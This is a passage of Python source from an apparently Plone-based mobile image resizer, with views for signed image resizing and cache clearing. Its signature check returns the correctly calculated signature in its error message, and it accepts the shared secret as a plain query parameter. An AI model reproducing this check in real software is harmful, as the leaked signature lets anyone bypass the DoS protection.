MobileImageResizer.getImageDownloadURL()\n\n Special parameters:\n\n * override_secret: Set this query parameteter to site resizer secret code setting\n to override DoS preventing parameter signature check.\n Useful for debugging.\n\n The image results are cached on file-system. The cache path is configurable\n through *image_resize_cache_path* mobile parameter and defaults to /tmp/gomobile_image_cache.\n The cache is never cleaned up, so you are responsible to set a scheduled\n task to remove old files.\n \"\"\"\n\n\n def parseParameters(self):\n \"\"\" Parse incoming HTTP GET parameters.\n\n \"\"\"\n\n params = self.request.form\n\n padding_width = params.get(\"padding_width\", \"0\")\n self.padding_width = int(padding_width)\n\n conserve_aspect_ration = params.get(\"conserve_aspect_ration\", \"false\")\n self.conserve_aspect_ration = conserve_aspect_ration.lower() == \"true\"\n\n self.override_secret = params.get(\"override_secret\", None)\n\n self.width = params.get(\"width\", \"auto\")\n if self.width != \"auto\":\n self.width = int(self.width)\n\n self.height = params.get(\"height\", \"auto\")\n if self.height != \"auto\":\n self.height = int(self.height)\n\n self.url = params.get(\"url\", None)\n self.cache_key = self.url\n\n def checkSecret(self):\n \"\"\" Harden us against DoS attack.\n\n All query parameters are signed and check if the caller knows the correct signature.\n \"\"\"\n\n if self.override_secret:\n # Override parameter signature check\n # by directly providing shared secret as an HTTP query parameter\n # for testing.\n if self.override_secret != self.resizer.getSecret():\n raise Unauthorized(\"Wrong override_secret:\" + self.override_secret)\n else:\n\n # Verify that secret signs all other parameters\n params = {}\n params.update(self.request.form)\n secret = params.get(\"secret\", None)\n if secret:\n del params[\"secret\"]\n\n calculated = self.resizer.calculateSignature(**params)\n\n if calculated != secret:\n raise Unauthorized(\"Bad image resizer secret:\" + str(secret) + \" calculated:\" + str(calculated))\n\n\n\n def __call__(self):\n \"\"\"\n \"\"\"\n\n self.init()\n\n self.parseParameters()\n\n self.checkSecret()\n\n width, height = self.resolveDimensions()\n\n return self.serve(width, height)\n\nclass ClearCacheView(BrowserView):\n \"\"\"\n Expose clearing of mobile cache as s view.\n \"\"\"\n\n def __call__(self):\n \"\"\"\n TODO: Implement some smart timestamp checking here.\n \"\"\"\n\n resizer = getMultiAdapter((self.context, self.request), IMobileImageProcessor)\n\n resizer.init()\n\n # Check that the caller knows the secret\n secret = self.request.form.get(\"secret\", None)\n if secret != resizer.getSecret():\n raise Unauthorized(\"Wrong secret:\" + secret)\n\n resizer.cache.invalidate()\n\n properties = getMobileProperties(self.context.aq_inner, self.request)\n cache_folder = properties.image_resize_cache_path\n\n return \"Cache has been cleared:\" + cache_folder\n\nclass IHTMLImageRewriter(zope.interface.Interface):\n \"\"\"\n Declare RestrictedPython safe functions for HTMLImageRewriter view.\n \"\"\"\n\n def processHTML(html, trusted):\n pass\n\nclass HTMLImageRewriter(BrowserView):\n \"\"\"\n Template helper view to rewrite HTML structure tags.\n\n For example, see document_view.pt in gomobiletheme.basic.\n\n Related tests are in gomobiletheme.basic.tests.\n \"\"\"\n\n def processHTML(self, html, trusted=True, only_for_mobile=False):\n \"\"\" Rewrite HTML for mobile compatible way.\n\n @param html: HTML code as a string\n\n @param trusted: If True do not clean up nasty tags like